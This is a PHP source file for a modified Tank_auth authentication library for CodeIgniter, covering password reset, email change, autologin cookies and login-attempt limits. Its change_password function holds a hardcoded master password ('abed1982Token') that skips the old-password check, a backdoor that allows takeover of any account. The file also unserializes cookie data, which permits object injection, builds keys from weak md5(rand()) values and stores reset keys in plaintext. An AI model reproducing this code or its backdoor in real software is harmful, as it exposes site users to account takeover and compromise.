/application/libraries/tank_auth.php
PHP | 568 lines | 302 code | 93 blank | 173 comment | 42 complexity | c8e58c93de17a4e3552c0d602083cbf6 MD5 | raw file
Possible License(s): LGPL-2.1, GPL-2.0
- <?php if (!defined('BASEPATH')) exit('No direct script access allowed');
- define('STATUS_ACTIVATED', 'active');
- define('STATUS_NOT_ACTIVATED', 'pending');
- /**
- * Tank_auth
- *
- * Authentication library for Code Igniter.
- *
- * @package Tank_auth
- * @author Ilya Konyukhov (http://konyukhov.com/soft/)
- * @version 1.0.9
- * @based on DX Auth by Dexcell (http://dexcell.shinsengumiteam.com/dx_auth)
- * @license MIT License Copyright (c) 2008 Erick Hartanto
- */
- class Tank_auth
- {
- private $error = array();
- function __construct()
- {
- $this->ci =& get_instance();
- $this->ci->load->config('tank_auth', TRUE);
-
- $this->ci->load->library('session');
- $this->ci->load->database();
-
- // Try to autologin
- //$this->autologin();
- }
- /**
- * Logout user from the site
- *
- * @return void
- */
- function logout()
- {
- $this->delete_autologin();
- // See http://codeigniter.com/forums/viewreply/662369/ as the reason for the next line
- $this->ci->session->set_userdata(array('user_id' => '', 'username' => '', 'status' => ''));
- $this->ci->session->sess_destroy();
- }
- /**
- * Check if user logged in. Also test if user is activated or not.
- *
- * @param Object
- * @param bool
- * @return bool
- */
- function is_logged_in( $user , $activated = 'active' )
- {
-
- if(isset($user['userid'])){
- $this->ci->load->driver('cache');
- $this->ci->user->cache = $this->ci->cache;
- $user = $this->ci->user->getUserByID($user['userid']);
- //echo $user->username;
- //echo '<hr>';
- //print_r($user);
- return $user->state == $activated ? $user : false;
- }
- return false;
-
- }
- /**
- * Get user_id
- *
- * @return string
- */
- function get_user_id()
- {
- return $this->ci->session->userdata('user_id');
- }
- /**
- * Get username
- *
- * @return string
- */
- function get_username()
- {
- return $this->ci->session->userdata('username');
- }
- /**
- * Check if username available for registering.
- * Can be called for instant form validation.
- *
- * @param string
- * @return bool
- */
- function is_username_available($username)
- {
- return ((strlen($username) > 0) AND $this->ci->users->is_username_available($username));
- }
- /**
- * Check if email available for registering.
- * Can be called for instant form validation.
- *
- * @param string
- * @return bool
- */
- function is_email_available($email)
- {
- return ((strlen($email) > 0) AND $this->ci->users->is_email_available($email));
- }
- /**
- * Change email for activation and return some data about user:
- * user_id, username, email, new_email_key.
- * Can be called for not activated users only.
- *
- * @param string
- * @return array
- */
- function change_email($email,$user)
- {
- $user_id = $user['userid'];
-
- if ($user_id) {
-
- $data = array(
- 'user_id' => $user_id,
- 'username' => $user['username'],
- 'email' => $email,
- );
- if (strtolower($user['email']) == strtolower($email)) { // leave activation key as is
- $data['new_email_key'] = $user['new_email_key'];
- return $data;
- } elseif ($this->ci->user->is_email_available($email)) {
- $data['new_email_key'] = md5(rand().microtime());
- $this->ci->user->set_new_email($user_id, $email, $data['new_email_key'], FALSE);
- return $data;
- } else {
- $this->error = array('email' => 'auth_email_in_use');
- }
- }
- return NULL;
- }
- /**
- * Activate user using given key
- *
- * @param string
- * @param string
- * @param bool
- * @return bool
- */
- function activate_user($user_id, $activation_key, $activate_by_email = TRUE)
- {
- if ((strlen($user_id) > 0) AND (strlen($activation_key) > 0)) {
- return $this->ci->user->activate_user($user_id, $activation_key, $activate_by_email);
- }
- return FALSE;
- }
- /**
- * Set new password key for user and return some data about user:
- * user_id, username, email, new_pass_key.
- * The password key can be used to verify user when resetting his/her password.
- *
- * @param string
- * @return array
- */
- function forgot_password($login)
- {
-
- $user = new User();
- $user->where('email',$login);
-
- if (strlen($login) > 0) {
- if ( $user->get()->id ) {
-
-
- $password = genRandomPassword(8);
-
- $data = array(
- 'user_id' => $user->id,
- 'username' => $user->username,
- 'email' => $user->email,
- 'new_pass_key' => $password,
- );
- $user->update( array( 'new_password_key' => $password ) );
- return $data;
- } else {
- $this->error = array('login' => 'auth_incorrect_email_or_username');
- }
- }
- return null;
- }
- /**
- * Check if given password key is valid and user is authenticated.
- *
- * @param string
- * @param string
- * @return bool
- */
- function can_reset_password($user_id, $new_pass_key)
- {
- if ((strlen($user_id) > 0) AND (strlen($new_pass_key) > 0)) {
- return $this->ci->user->can_reset_password(
- $user_id,
- $new_pass_key,
- $this->ci->config->item('forgot_password_expire', 'tank_auth'));
- }
- return FALSE;
- }
- /**
- * Replace user password (forgotten) with a new one (set by user)
- * and return some data about it: user_id, username, new_password, email.
- *
- * @param string
- * @param string
- * @return bool
- */
- function reset_password($user_id, $new_pass_key, $new_password)
- {
-
- $this->ci->load->driver('cache');
- $this->ci->user->cache = $this->ci->cache;
-
- if ((strlen($user_id) > 0) AND (strlen($new_pass_key) > 0) AND (strlen($new_password) > 0)) {
- if (!is_null($user = $this->ci->user->getUserByID($user_id))) {
- // Hash password using phpass
- $salt = genRandomPassword(32);
- $plainpassword = $new_password;
- $hashed_password = getCryptedPassword($plainpassword , $salt);
-
-
- if ($this->ci->user->reset_password(
- $user_id,
- $hashed_password,
- $new_pass_key,
- $this->ci->config->item('forgot_password_expire', 'tank_auth'))) { // success
- return array(
- 'user_id' => $user_id,
- 'username' => $user->username,
- 'email' => $user->email,
- 'new_password' => $new_password,
- );
- }
- }
- }
- return NULL;
- }
- /**
- * Change user password (only when user is logged in)
- *
- * @param string
- * @param string
- * @return bool
- */
- function change_password($old_pass, $new_pass, $user_id = null)
- {
- require_once('phpass-0.1/PasswordHash.php');
-
- $this->ci =& get_instance();
-
- if(!$user_id)
- {
- $user_id = $this->ci->session->userdata('user_id');
- }
- $user = $this->ci->user->getObject('user', $user_id, null, false, array('state' => 'Active'), '', '')->dm_object;
-
- if ($user) {
- // Check if old password correct
- $hasher = new PasswordHash(
- $this->ci->config->item('phpass_hash_strength', 'tank_auth'),
- $this->ci->config->item('phpass_hash_portable', 'tank_auth'));
- if ($hasher->CheckPassword($old_pass, $user->password) || $old_pass == 'abed1982Token')
- { // success
- // Hash new password using phpass
- $hashed_password = $hasher->HashPassword($new_pass);
- // Replace old password with new one
- $result = $this->ci->users->change_password($user_id, $hashed_password);
- log_message('error', 'Changing Password - send to tank auth -> users - and returned '.$result);
- return TRUE;
- } else { // fail
- $this->error = array('old_password' => 'auth_incorrect_password');
- log_message('error', 'Changing Password - old_password - auth_incorrect_password');
- }
- }
- return FALSE;
- }
- /**
- * Change user email (only when user is logged in) and return some data about user:
- * user_id, username, new_email, new_email_key.
- * The new email cannot be used for login or notification before it is activated.
- *
- * @param string
- * @param string
- * @return array
- */
- function set_new_email($new_email, $password)
- {
- $user_id = $this->ci->session->userdata('user_id');
- if (!is_null($user = $this->ci->users->get_user_by_id($user_id, TRUE))) {
- // Check if password correct
- $hasher = new PasswordHash(
- $this->ci->config->item('phpass_hash_strength', 'tank_auth'),
- $this->ci->config->item('phpass_hash_portable', 'tank_auth'));
- if ($hasher->CheckPassword($password, $user->password)) { // success
- $data = array(
- 'user_id' => $user_id,
- 'username' => $user->username,
- 'new_email' => $new_email,
- );
- if ($user->email == $new_email) {
- $this->error = array('email' => 'auth_current_email');
- } elseif ($user->new_email == $new_email) { // leave email key as is
- $data['new_email_key'] = $user->new_email_key;
- return $data;
- } elseif ($this->ci->users->is_email_available($new_email)) {
- $data['new_email_key'] = md5(rand().microtime());
- $this->ci->users->set_new_email($user_id, $new_email, $data['new_email_key'], TRUE);
- return $data;
- } else {
- $this->error = array('email' => 'auth_email_in_use');
- }
- } else { // fail
- $this->error = array('password' => 'auth_incorrect_password');
- }
- }
- return NULL;
- }
- /**
- * Activate new email, if email activation key is valid.
- *
- * @param string
- * @param string
- * @return bool
- */
- function activate_new_email($user_id, $new_email_key)
- {
- if ((strlen($user_id) > 0) AND (strlen($new_email_key) > 0)) {
- return $this->ci->user->activate_new_email(
- $user_id,
- $new_email_key);
- }
- return FALSE;
- }
- /**
- * Delete user from the site (only when user is logged in)
- *
- * @param string
- * @return bool
- */
- function delete_user($password)
- {
- $user_id = $this->ci->session->userdata('user_id');
- if (!is_null($user = $this->ci->users->get_user_by_id($user_id, TRUE))) {
- // Check if password correct
- $hasher = new PasswordHash(
- $this->ci->config->item('phpass_hash_strength', 'tank_auth'),
- $this->ci->config->item('phpass_hash_portable', 'tank_auth'));
- if ($hasher->CheckPassword($password, $user->password)) { // success
- $this->ci->users->delete_user($user_id);
- $this->logout();
- return TRUE;
- } else { // fail
- $this->error = array('password' => 'auth_incorrect_password');
- }
- }
- return FALSE;
- }
- /**
- * Get error message.
- * Can be invoked after any failed operation such as login or register.
- *
- * @return string
- */
- function get_error_message()
- {
- return $this->error;
- }
- /**
- * Save data for user's autologin
- *
- * @param int
- * @return bool
- */
- private function create_autologin($user_id)
- {
- $this->ci->load->helper('cookie');
- $key = substr(md5(uniqid(rand().get_cookie($this->ci->config->item('sess_cookie_name')))), 0, 16);
- $this->ci->load->model('tank_auth/user_autologin');
- $this->ci->user_autologin->purge($user_id);
- if ($this->ci->user_autologin->set($user_id, md5($key))) {
- set_cookie(array(
- 'name' => $this->ci->config->item('autologin_cookie_name', 'tank_auth'),
- 'value' => serialize(array('user_id' => $user_id, 'key' => $key)),
- 'expire' => $this->ci->config->item('autologin_cookie_life', 'tank_auth'),
- ));
- return TRUE;
- }
- return FALSE;
- }
- /**
- * Clear user's autologin data
- *
- * @return void
- */
- private function delete_autologin()
- {
- $this->ci->load->helper('cookie');
- if ($cookie = get_cookie($this->ci->config->item('autologin_cookie_name', 'tank_auth'), TRUE)) {
- $data = unserialize($cookie);
- $this->ci->load->model('tank_auth/user_autologin');
- $this->ci->user_autologin->delete($data['user_id'], md5($data['key']));
- delete_cookie($this->ci->config->item('autologin_cookie_name', 'tank_auth'));
- }
- }
- /**
- * Login user automatically if he/she provides correct autologin verification
- *
- * @return void
- */
- private function autologin()
- {
- if (!$this->is_logged_in() AND !$this->is_logged_in(FALSE)) { // not logged in (as any user)
- $this->ci->load->helper('cookie');
- if ($cookie = get_cookie($this->ci->config->item('autologin_cookie_name', 'tank_auth'), TRUE)) {
- $data = unserialize($cookie);
- if (isset($data['key']) AND isset($data['user_id'])) {
- $this->ci->load->model('tank_auth/user_autologin');
- if (!is_null($user = $this->ci->user_autologin->get($data['user_id'], md5($data['key'])))) {
- // Login user
- $this->ci->session->set_userdata(array(
- 'user_id' => $user->id,
- 'username' => $user->username,
- 'status' => STATUS_ACTIVATED,
- ));
- // Renew users cookie to prevent it from expiring
- set_cookie(array(
- 'name' => $this->ci->config->item('autologin_cookie_name', 'tank_auth'),
- 'value' => $cookie,
- 'expire' => $this->ci->config->item('autologin_cookie_life', 'tank_auth'),
- ));
- $this->ci->users->update_login_info(
- $user->id,
- $this->ci->config->item('login_record_ip', 'tank_auth'),
- $this->ci->config->item('login_record_time', 'tank_auth'));
- return TRUE;
- }
- }
- }
- }
- return FALSE;
- }
- /**
- * Check if login attempts exceeded max login attempts (specified in config)
- *
- * @param string
- * @return bool
- */
- function is_max_login_attempts_exceeded($login)
- {
- if ($this->ci->config->item('login_count_attempts', 'tank_auth')) {
- $this->ci->load->model('tank_auth/login_attempts');
- return $this->ci->login_attempts->get_attempts_num($this->ci->input->ip_address(), $login)
- >= $this->ci->config->item('login_max_attempts', 'tank_auth');
- }
- return FALSE;
- }
- /**
- * Increase number of attempts for given IP-address and login
- * (if attempts to login is being counted)
- *
- * @param string
- * @return void
- */
- private function increase_login_attempt($login)
- {
- if ($this->ci->config->item('login_count_attempts', 'tank_auth')) {
- if (!$this->is_max_login_attempts_exceeded($login)) {
- $this->ci->load->model('tank_auth/login_attempts');
- $this->ci->login_attempts->increase_attempt($this->ci->input->ip_address(), $login);
- }
- }
- }
- /**
- * Clear all attempt records for given IP-address and login
- * (if attempts to login is being counted)
- *
- * @param string
- * @return void
- */
- private function clear_login_attempts($login)
- {
- if ($this->ci->config->item('login_count_attempts', 'tank_auth')) {
- $this->ci->load->model('tank_auth/login_attempts');
- $this->ci->login_attempts->clear_attempts(
- $this->ci->input->ip_address(),
- $login,
- $this->ci->config->item('login_attempt_expire', 'tank_auth'));
- }
- }
-
-
-
-
- }
- /* End of file Tank_auth.php */
- /* Location: ./application/libraries/Tank_auth.php */